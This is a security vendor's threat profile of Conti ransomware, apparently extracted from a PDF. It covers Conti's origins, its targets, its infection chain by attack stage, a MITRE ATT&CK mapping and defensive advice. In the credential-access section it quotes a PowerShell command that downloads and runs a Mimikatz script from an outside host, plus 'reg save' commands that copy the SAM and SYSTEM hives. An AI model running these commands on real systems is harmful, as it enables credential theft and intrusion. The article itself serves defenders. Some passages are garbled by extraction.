# Ransomware Spotlight: Conti **trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti** X Conti By Trend Micro Research Assumed to be the successor of the Ryuk ransomware, Conti is currently one of the most notorious active ransomware families used in highprofile attacks. Know all about this ransomware family and protect your company against this threat. ----- View infographic of "Ransomware Spotlight: Conti" [What do you need to know about Conti ransomware to help secure your organization?](https://www.trendmicro.com/vinfo/us/security/definition/ransomware) Assumed to be the successor of the [Ryuk ransomware,](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/addressing-threats-like-ryuk-via-trend-micro-xdr) [Conti is currently one of the most notorious active ransomware families, and is used as](https://www.trendmicro.com/en_us/research/21/c/vision-one-tracking-conti-ransomware.html) a [ransomware-as-a-service (RaaS) in high-profile attacks such as those launched against healthcare institutions in Ireland and](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks) [New Zealand.](https://www.rnz.co.nz/news/national/442795/waikato-hospitals-hit-by-cyber-security-incident) [Conti operators also leverage double extortion techniques, and have resorted to not just publishing stolen data, but also selling access to](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti) victim organizations that refused to pay the ransom. Armed with other stealthy techniques such as BazarLoader and other tricks up its sleeves, the Conti ransomware family has the tenth-most [attack attempts detected in the first half of the year, as reported in the Trend Micro 2021 Midyear Cybersecurity Report.](https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/attacks-from-all-angles-2021-midyear-security-roundup) On March 2, 2022, a Ukrainian researcher reportedly leaked some of the ransomware group’s files. Although the Conti group mostly uses open-source tools, this leak included important components, such as the code for the administrator panel, Conti Locker v2, and a decryptor. This code dump could potentially have a significant impact on the RaaS landscape. While on the cybersecurity side, researchers will be able to use this to gain further insight into Conti’s operations, the leak could also serve as a start-up kit for groups who may not have otherwise had the means to create their own RaaS operation. This development might end up being similar to the change seen in the internet-of-things (IoT) and Linux malware space when Mirai source code was leaked, where its code immediately become the new baseline for malicious actors, effectively raising the overall base sophistication of the IoT cybercrime landscape. As one of the most prolific and capable groups operating today, we would like to emphasize that the leak does not signal that Conti is in any way under pressure and at risk of shutting down — rather, we believe that it will force the ransomware gang to improve their capabilities and security to stay ahead of competitor groups who can use their leaked code to catch up. In addition, while the gang continues to operate as normal, we would expect new groups to emerge using the same tools, tactics, and procedures. This article details the Conti ransomware to help incident responders and security teams spot attacks easier. ## Top affected industries and counties Conti attacks have been detected all over the globe, with the US amassing over a million attack attempts from January 1 to November 12, 2021. The Netherlands and Taiwan ranked second and third respectively. Figure 1. Countries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021) _Source: Trend Micro™ Smart Protection Network™ infrastructure_ The retail industry saw the most Conti attack attempts, followed by insurance, manufacturing, and telecommunications. Healthcare, which [Conti operators targeted in high-profile attacks this year, is sixth on the list.](https://www.theregister.com/2021/05/14/ireland_hse_ransomware_hospital_conti_wizardspider/) ----- Figure 2. Industries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021) _Source: Trend Micro™ Smart Protection Network™ infrastructure_ ## Infection chain and techniques Figure 3. Conti infection chain **Initial Access** Conti can arrive in the system through BazarLoader, which is delivered via phishing emails containing a Google Drive link that downloads the malware. [Alternatively, the ransomware can arrive via exploiting the the FortiGate firewall vulnerabilities CVE-2018-13379 and](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379) [CVE-2018-13374.](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13374) After successfully exploiting the application, the ransomware deploys Cobalt Strike to gain a foothold on the system. Conti can also arrive as a result of the exploitation of the ProxyShell Microsoft Exchange vulnerabilities. **Discovery** For initial reconnaissance, the Conti group uses tools such as Whoami, Nltest, and Net. These tools give the operators information about where they are in the system, and what rights and permissions they have. [Since the operators employ double extortion tactics, they actively look for files to exfiltrate in the discovery stage. The threat actors use](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti) tools such as ShareFinder to identify the shares needed for exfiltration and ransomware deployment. **Privilege Escalation** ----- t oug t e g oup ost y e es o d g t e do a ad c ede t a s to ga u access to t e do a, t ey ay a so use a coup e o [exploits like Zerologon (CVE-2020-1472) and PrintNightmare (CVE-2021-1675), to elevate their privilege and further strengthen their](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472) foothold in the network. **Credential Access** The attackers dump cached credentials on systems to allow them to move laterally or elevate their privilege. They use tools such as ProcDump to dump system process/es (usually lssas.exe) and use it in combination with Mimikatz to dump credentials. In other cases, they may use mass-mimikatz, a module from Empire, to dump the credentials on multiple systems. Mimikatz (mass-mimikatz, from Empire) C:\WINDOWS\SYSTEM32\WBEM\WMIC.exe /node:localhost process call create powershell /c IEX (NewObjectNet.WebClient).DownloadString('https://raw.githubusercontent[.]com/PowerShellEmpire/PowerTools/master/PewPewPew/In MassMimikatz.ps1');'24346D,COMPUTERNAME2'|Invoke-MassMimikatz -Verbose > c:/programdata/2.txt Alternatively, they may also use the kerberoasting module of the PowerShell empire or use tools like Rubeus. The attackers may also use native Windows tools, such as Task Manager, to dump the memory of lsass or use the comsvcs DLL file’s MiniDump function. They also gain access to the credentials by taking them out of password stores. One of the ways to do this is through “reg save” commands. - reg save HKLM\SAM C:\programdata\SamBkup.hiv - reg save HKLM\SYSTEM C:\programdata\FileName.hiv They can also use tools such as Get-GPPPassword to get plain text passwords stored in the group policy preference They can also gain credentials from browsers and cloud applications using tools such as SharpChrome and SeatBelt. After gaining enough credentials, they use SMBAutoBrute to automate the task of bruteforcing the passwords and see what password works. After gaining information on the domain accounts, the attackers then dump the domain controller credentials using Ntdsutil. Alternatively, they can also use Vssadmin to create a snapshot of the system and download Ntds.dit to accomplish this. **Lateral Movement** The attackers can also use batch files to disable security tools. These files are executed through scheduled tasks. The groups are also known to use third-party tools such as Atera and AnyDesk to control remote systems. The operators are also known to use EternalBlue to move laterally in the network of systems that are vulnerable to this exploit. They also use PSExec to remotely execute scripts and the ransomware itself. **Defense Evasion** Just before the execution of the ransomware, threat actors create a series of batch files to automate the distribution of its tools in the domain. These tools include scripts to terminate existing security software. The operators can also use other tools, like GMER, PC Hunter, and PowerShell, to accomplish this. **Execution** Ties to the Trickbot gang gave Conti operators the ability to execute the ransomware via BazarLoader, which leads to Cobalt Strike, which eventually leads to the ransomware itself. Once the actors are inside the network, they tend to use scheduled tasks and batch files as a means of execution on remote systems. Alternatively, to execute the ransomware the operators can use files such as the DontSleep.exe process, which calls the task manager where the file can be executed. **Exfiltration** The attackers perform data exfiltration on the system with the use of the Rclone tool, which is an open-source tool used for syncing files to a specified cloud storage, such as Mega cloud storage. The group can also use WinSCP to exfiltrate data. **Impact** ----- te e t at o a d d st but o o t e a so a e to t e ta geted e dpo ts, t e es a e o e c ypted us g C aC a 0 t RSA4096 to protect the ChaCha key and nonce. The ransomware also inhibits system recovery by deleting shadow copies using WMI. ## MITRE tactics and techniques **Initial** **Access** **Execution** **Persistence** **Credential** **Access** **T1003 - OS** credential dumping _Dumps_ _LSASS_ _memory to be_ _used for_ _retrieving_ _password_ _hashes_ **T1555 -** Credentials from password stores _Extracts_ _passwords_ _from_ _credential_ _stores using_ _tools such as_ _SharpChrome,_ _Seatbelt, and_ _net-_ _GPPPassword_ **T1552 -** Unsecured credentials _Retrieves_ _credentials_ _using_ _Mimikatz_ **Lateral** **Movement** **Defense Evasion** **Command** **and Control** **Exfilt** **T1566 -** Phishing _Arrives via_ _phishing_ _emails with_ _BazarLoader_ **T1190 -** Exploit public-facing application _Arrives via_ _firewall_ _exploits_ _(CVE-2018-_ _13379 and_ _CVE-2018-_ _13374)_ **T1106 -** Execution through API _Uses native_ _API to execute_ _commands_ _such as_ _deleting_ _shadow copies_ **T1059.003 -** Command and scripting interpreter: Windows command shell _Uses batch_ _files to_ _distribute and_ _execute_ _ransomware_ **T1047 -** Windows Management Instrumentation _Uses WMI to_ _execute batch_ _files and delete_ _shadow copies_ **T1204 - User** execution _User execution_ _is needed to_ _carry out the_ _payload from_ _the spear_ _phishing link_ **T1053.005 -** Scheduled task/job: scheduled task _Uses_ _scheduled_ _tasks as a_ _means of_ _execution for_ _the_ _ransomware_ **T1053.005 -** Scheduled task/job: Scheduled task _Uses_ _scheduled_ _tasks as a_ _means of_ _execution_ _for the_ _ransomware_ **Privilege** **Escalation** **T1078.002 -** Valid accounts: domain accounts _Uses domain_ _administrator_ _accounts to_ _escalate_ _privilege in the_ _system_ **T1083 - File** and directory discovery _Searches for_ _specific files_ _and directory_ _related to its_ _encryption_ **T1018** - Remote system discovery _Enumerates_ _ARP entries to_ _enable_ _distribution to_ _remote systems_ **T1057 -** Process discovery _Discovers_ _certain_ _processes for_ _process_ _termination_ **T1016 - System** network configuration discovery _Enumerates_ _ARP entries to_ _enable_ _distribution to_ _remote systems_ **T1069.002** - Permission groups discovery: domain groups _Searches for_ _group_ _information for_ _privilege_ _escalation_ **T1082 - System** information discovery _Logs system_ _information for_ _information on_ _the system_ **T1570 -** Lateral tool transfer _Uses_ _BITSAdmin to_ _transfer tools_ _across the_ _network_ **T1021.002 -** Remote services: SMB/Windows admin shares _Cobalt Strike_ _uses admin_ _shares to_ _distribute itself_ _to remote_ _systems_ **T1562.001 - Impair** defenses: disable or modify tools _Terminates certain_ _security related_ _software_ **T1140 -** Deobfuscate/Decode files or information _Ransomware is_ _obfuscated to make_ _detection more_ _difficult_ **T1055 - Process** injection _Uses process_ _injection to make_ _detection more_ _difficult_ **T1071 -** Application Layer Protocol _Uses http to_ _communicate_ _to its C&C_ _server_ **T1219 -** Remote access software _Uses RMM_ _software_ _such as_ _AnyDesk and_ _Atera_ **T156** Exfilt over servic exfiltr to clo stora _Sync_ _to a_ _speci_ _cloud_ _stora_ _such_ _Mega_ _stora_ ----- **Initial** **Access** **Execution** **Persistence** **Privilege** **Escalation** **T1033 - System** owner/user discovery _Performs user_ _discovery for_ _privilege_ _escalation_ **T1012 - Query** registry _Queries certain_ _registry for_ _stored_ _passwords_ **T1063 -** Security software discovery Discovers security software for reconnaissance and termination **Credential** **Access** **Lateral** **Movement** **Defense Evasion** **Command** **and Control** **Exfilt** ## Summary of malware, tools, and exploits used Security teams can watch out for the presence of the following malware tools, and exploits that are typically used in Conti attacks: **Defense** **Evasion** AV Uninstall Cobeacon GMER Gpedit PCHunter PowerTool KillAV **Initial Entry** **Execution** **Discovery** **Privilege** **Escalation** **Credential Access** Phishing emails Firewall exploits (CVE201813379 and CVE201813374) BazarLoader/ BazarBackdoor Cobalt Strike DontSleep Adfind Net NetScan Nltest ShareFinder SharpView PowerUpSQL Whoami EternalBlue (Ms17_010) Mimikatz PowerUpSQL PrintNightmare (CVE-20211675) RouterScan Zerologon (CVE-20201472) EComsvcs.dll Mimikatz NetGPPPassword Ntdsutil PowerShell Empire: Kerberoast ProcDump RouterScan Rubeus SharpChrome SMB AutoBrute Task Manager Vssadmin **Lateral** **Movement** AnyDesk Atera BITSAdmin Cobalt Strike EternalBlue Mimikatz PsExec ## Recommendations To help defend systems against similar threats, organizations can establish security frameworks, which can allocate resources systematically for establishing a solid defense against ransomware. Here are some best practices that can be included in these frameworks: **Audit and inventory** Take an inventory of assets and data Identify authorized and unauthorized devices and software Make an audit of event and incident logs ----- **Configure and monitor** Manage hardware and software configurations Grant admin privileges and access only when necessary to an employee’s role Monitor network ports, protocols, and services Activate security configurations on network infrastructure devices such as firewalls and routers Establish a software allow list that only executes legitimate applications **Patch and update** Conduct regular vulnerability assessments Perform patching or virtual patching for operating systems and applications Update software and applications to their latest versions **Protect and recover** Implement data protection, backup, and recovery measures Enable multifactor authentication **Secure and defend** Employ sandbox analysis for blocking malicious emails Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network [Detect early signs of an attack such as the presence of suspicious tools in the system](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-threat-spotlight-theme-in-2021) Use advanced detection technologies such as those powered by AI and machine learning **Train and test** Regularly train and assess employees on security skills Do red-team exercises and penetration tests A multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and network). Security solutions can detect malicious components and suspicious behavior could help protect enterprises. [Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools](https://www.trendmicro.com/en_us/business/products/detection-response.html) early on before the ransomware can do irreversible damage to the system. [Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This](https://www.trendmicro.com/en_us/business/products/hybrid-cloud/cloud-one-workload-security.html) protection is made possible through techniques such as virtual patching and machine learning. [Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block](https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/email-inspector.html) malicious emails, including phishing emails that can serve as entry points for ransomware. [Trend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats](https://www.trendmicro.com/en_us/business/products/user-protection/sps/endpoint.html) and ransomware, ensuring the protection of endpoints. ## Indicators of Compromise The IOCs for this article can be found [here. Actual indicators might vary per attack.](https://documents.trendmicro.com/images/TEx/articles/iocs_conti_spotlightG4OwzN7.txt) HIDE **Like it? Add this infographic to your site:** 1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V). Image will appear the same size as you see above. -----